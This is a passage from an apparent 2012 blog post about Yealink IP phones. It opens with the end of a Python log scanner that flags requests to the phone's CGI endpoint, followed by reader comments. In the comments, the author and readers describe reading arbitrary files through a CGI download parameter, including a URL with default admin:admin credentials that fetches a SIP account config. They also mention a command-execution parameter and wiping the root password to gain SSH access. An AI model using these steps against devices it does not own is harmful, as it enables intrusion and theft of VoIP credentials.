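        if not m or m.group("path") != CGI_PATH:
            continue
        result = classify(m.group("query"))
        if result:
            findings.append(Finding(m.group("ts"), *result))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("%-5s %s %s %s" % (f.severity, f.ts, f.kind, f.detail))
```

The web UI's own reboot goes through xmlHttpPostAsyn, and the post does not show how POST bodies are logged, so this covers only requests whose query string appears in the log line.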

     
    • gerod006 14:03 on June 19, 2012 Permalink | Reply

      How can I download files in tmp?

      • duncanbowring 17:58 on June 19, 2012 Permalink | Reply

        Same method, just include the path in your download URL. /tmp/file. You have to make sure it’s readable, so use ls to check the perms. Interestingly, everything the webserver does is as root, so you can do anything.

    • gerod006 20:36 on June 19, 2012 Permalink | Reply

      Is there some way to download the whole tmp folder? I don’t know each file. I want an xml file… Thanks

      • duncanbowring 20:47 on June 19, 2012 Permalink | Reply

        You’d have to write a script to do it. Look at my instruction on command execution, you can run ls to get a directory listing. From there you can tell what you need.

        If you are handy with scripting you could automate the process.

        However, if you remove the root password, you can ssh in and then use scp to grab what you need from there like standard Linux.

    • gerod006 20:51 on June 19, 2012 Permalink | Reply

      OK, I will try it
      Thanks

    • gerod006 08:38 on June 21, 2012 Permalink | Reply

      Hi, I downloaded the files that I need. I found the path: http://admin:admin@192.168.5.124/cgi-bin/cgiServer.exx?download=/config/user/voip/sipAccount0.cfg and other files. I couldn’t execute a script, I don’t know how to execute it. http://admin:admin@192.168.5.124/cgi-bin/cgiServer.exx?comand=script ? Is it OK?
      I need to modify the files and upload or replace them.
      Thanks.

      • duncanbowring 08:42 on June 21, 2012 Permalink | Reply

        It might be easier to wipe out the root password and do it all via putty/ssh.

        What are you trying to modify?

        • gerod006 08:55 on June 21, 2012 Permalink

          I will register a line automatically; with an application I will generate the .cfg file and replace it. I did it with other phones, but with them I can use telnet.
          I didn’t like to modify other things in the phone..

        • duncanbowring 16:47 on June 21, 2012 Permalink

          Of course, that’s a good idea. You could wipe out root then add a new user to remotely administrate them via ssh. Central configuration would make a great addition to this tutorial. 🙂

        • duncanbowring 18:19 on July 22, 2012 Permalink

          hey how did you get on with things?

    • gerod006 07:25 on July 23, 2012 Permalink | Reply

      I did it with auto-provisioning; I created a configuration file in the tftpboot folder (Linux).
      <>
      And when the Yealink reboots, it reads the file.

    • Sam 09:49 on November 6, 2012 Permalink | Reply

      Hello there,
      I am far from a programmer, but like to try-
      I was wondering if it’s running Linux would it allow you to configure the phone to hit a relay on an action?
